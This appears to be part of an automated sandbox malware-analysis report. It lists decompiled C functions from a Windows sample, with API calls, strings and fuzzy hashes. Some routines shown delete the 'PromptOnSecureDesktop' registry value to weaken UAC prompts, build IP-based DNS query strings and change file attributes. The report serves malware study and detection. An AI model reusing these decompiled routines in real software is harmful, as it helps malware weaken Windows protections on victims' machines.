				if(RegOpenKeyExA(0x80000001, _t6, 0, 0x103,  &_v8) == 0) {
					_t10 = E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8);
					_t24 = _t24 + 0x14;
					RegDeleteValueA(_v8, _t10);
					RegCloseKey(_v8);
				}
				E0040EE2A(_t16, 0x4122f8, 0, 0x100);
				return 0;
			}








                                                                                0x004096ff
                                                                                0x00409702
                                                                                0x00409728
                                                                                0x0040972d
                                                                                0x0040973e
                                                                                0x0040974a
                                                                                0x0040974f
                                                                                0x00409756
                                                                                0x0040975f
                                                                                0x0040975f
                                                                                0x0040976d
                                                                                0x0040977b

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
                                                                                • RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
                                                                                • RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenValue
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 849931509-2980165447
                                                                                • Opcode ID: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
                                                                                • Instruction ID: 5e38ed9511aa8cc069582274463af9cddeeab7037fd65aad7bdf8be664a95ff7
                                                                                • Opcode Fuzzy Hash: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
                                                                                • Instruction Fuzzy Hash: 5AF0C8B2680118BBF3106B51AC0BFDF3A2CDB44704F100075F605B50D2E6E55E9082BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02089966 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0208999D
                                                                                • RegDeleteValueA.ADVAPI32(?,00000000), ref: 020899BD
                                                                                • RegCloseKey.ADVAPI32(?), ref: 020899C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenValue
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 849931509-2980165447
                                                                                • Opcode ID: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                • Instruction ID: fd83014183e0f56e3d990b065027e0b32d58bd00216c49600da3c46b88e24f73
                                                                                • Opcode Fuzzy Hash: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                • Instruction Fuzzy Hash: 6AF0F6B2680218BFF7117B55EC06FDF3A2CDB94B14F100060FA45B5081F6E59A9096B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020828EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg$u6A
                                                                                • API String ID: 1594361348-1940331995
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: 9faf818588b09c7dd415d233e9ad87b8e3038c083b23a76e77bddff0786243d5
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: 4BE0C230605251DFCB81AB2CF848AC637E4EF0A230F008180F8C0C31A0CB34DCC0A740
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020869C3 Relevance: 6.2, APIs: 4, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 020869E5
                                                                                • SetFileAttributesA.KERNEL32(?,00000002), ref: 02086A26
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 02086A3A
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 02086BD8
                                                                                  • Part of subcall function 0208EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02081DCF,?), ref: 0208EEA8
                                                                                  • Part of subcall function 0208EE95: HeapFree.KERNEL32(00000000), ref: 0208EEAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                • String ID:
                                                                                • API String ID: 3384756699-0
                                                                                • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction ID: 6543dae48372f8aac3f293bc485867bc7e60c65d638edd194f6fb80bd77aa19d
                                                                                • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction Fuzzy Hash: 8671377190021DEFDF11EFA4CC81AEEBBB9FB04318F10456AE555A6290D7319E92EB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401C5F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}















                                                                                0x00401c60
                                                                                0x00401c64
                                                                                0x00401c6a
                                                                                0x00401c71
                                                                                0x00401c74
                                                                                0x00401c86
                                                                                0x00401c8c
                                                                                0x00401d1c
                                                                                0x00401d1c
                                                                                0x00401d1e
                                                                                0x00401d1e
                                                                                0x00401d21
                                                                                0x00401d21
                                                                                0x00401d23
                                                                                0x00401d24
                                                                                0x00401d2a
                                                                                0x00401d2e
                                                                                0x00401d30
                                                                                0x00401d30
                                                                                0x00401d33
                                                                                0x00401d33
                                                                                0x00401d35
                                                                                0x00401d36
                                                                                0x00401d42
                                                                                0x00401d6b
                                                                                0x00401d7e
                                                                                0x00401d88
                                                                                0x00401d88
                                                                                0x00401d8b
                                                                                0x00401d95
                                                                                0x00401d95
                                                                                0x00401c96
                                                                                0x00401c9d
                                                                                0x00401ca4
                                                                                0x00401cab
                                                                                0x00401cae
                                                                                0x00401cb3
                                                                                0x00401cbd
                                                                                0x00401cd2
                                                                                0x00401cd2
                                                                                0x00401ce1
                                                                                0x00401cea
                                                                                0x00401cef
                                                                                0x00401cf4
                                                                                0x00401cfe
                                                                                0x00401cfe
                                                                                0x00401d04
                                                                                0x00401d0a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401d14
                                                                                0x00401d1a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401d1a
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                • API String ID: 2111968516-120809033
                                                                                • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403F18 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                0x00403f1e
                                                                                0x00403f22
                                                                                0x00403f27
                                                                                0x00403f2b
                                                                                0x00403f2e
                                                                                0x00403f3e
                                                                                0x00403f4c
                                                                                0x00403f7c
                                                                                0x00403f7f
                                                                                0x00403f86
                                                                                0x00000000
                                                                                0x00403f86
                                                                                0x00000000
                                                                                0x00403f83
                                                                                0x00403f59
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403f5f
                                                                                0x00403f7a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                • GetLastError.KERNEL32 ref: 00403F4E
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403F8C Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                0x00403f92
                                                                                0x00403f96
                                                                                0x00403f9b
                                                                                0x00403f9f
                                                                                0x00403fa2
                                                                                0x00403fb2
                                                                                0x00403fc0
                                                                                0x00403ff0
                                                                                0x00403ff3
                                                                                0x00403ffa
                                                                                0x00000000
                                                                                0x00403ffa
                                                                                0x00000000
                                                                                0x00403ff7
                                                                                0x00403fcd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403fd3
                                                                                0x00403fee
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                • GetLastError.KERNEL32 ref: 00403FC2
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208417F Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 020841AB
                                                                                • GetLastError.KERNEL32 ref: 020841B5
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 020841C6
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 020841D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: 84ab2b3d483db2de3ddd0446ba7fcca05cf9655ab7f64e9b7cb64f8a249f7f82
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: 9501CC7651120AAFDF01EF91ED84BEF7BACEB18255F104061F901E2050D774DA549BB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020841F3 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0208421F
                                                                                • GetLastError.KERNEL32 ref: 02084229
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 0208423A
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0208424D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 76e4934d3476f9001860cbae04dd53a185140269f848e10cc5c46de5c8c97336
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: F501087251520AAFDF02EF90ED84BEF7BACEB08255F418061F901E2050D770DA549BB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208E036 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 35stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcmp.KERNEL32(?,80000009), ref: 0208E066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 1534048567-1846390581
                                                                                • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction ID: 9e9754b466fccb918e933cc051f2bbb5acf9e05625caaf8e0252586d648b7226
                                                                                • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction Fuzzy Hash: D8F0CD322003069BCB62DF64DC84A83B7E8FB09325B048A2AF698C3060D370F4D8CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A4C7 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}






                                                                                0x0040a4dd
                                                                                0x0040a4df
                                                                                0x0040a4f7
                                                                                0x0040a4fa
                                                                                0x0040a4fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a4e6
                                                                                0x0040a4ed
                                                                                0x0040a4f1
                                                                                0x00000000
                                                                                0x0040a4f1
                                                                                0x00000000
                                                                                0x0040a4ed
                                                                                0x0040a504

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404E92 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                0x00404e9c
                                                                                0x00404ea6
                                                                                0x00404ea8
                                                                                0x00404ec0
                                                                                0x00404ec3
                                                                                0x00404ec7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404eaf
                                                                                0x00404eb6
                                                                                0x00404eba
                                                                                0x00000000
                                                                                0x00404eba
                                                                                0x00000000
                                                                                0x00404eb6
                                                                                0x00404ecd

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404BD1 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                0x00404bdb
                                                                                0x00404be5
                                                                                0x00404be7
                                                                                0x00404bff
                                                                                0x00404c02
                                                                                0x00404c06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404bee
                                                                                0x00404bf5
                                                                                0x00404bf9
                                                                                0x00000000
                                                                                0x00404bf9
                                                                                0x00000000
                                                                                0x00404bf5
                                                                                0x00404c0c

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004030FA Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                0x0040310b
                                                                                0x00403122
                                                                                0x00403128
                                                                                0x0040312c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403111
                                                                                0x00403118
                                                                                0x0040311c
                                                                                0x00000000
                                                                                0x0040311c
                                                                                0x00000000
                                                                                0x00403118
                                                                                0x00403131

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00403103
                                                                                • GetTickCount.KERNEL32 ref: 0040310F
                                                                                • Sleep.KERNEL32(00000000), ref: 0040311C
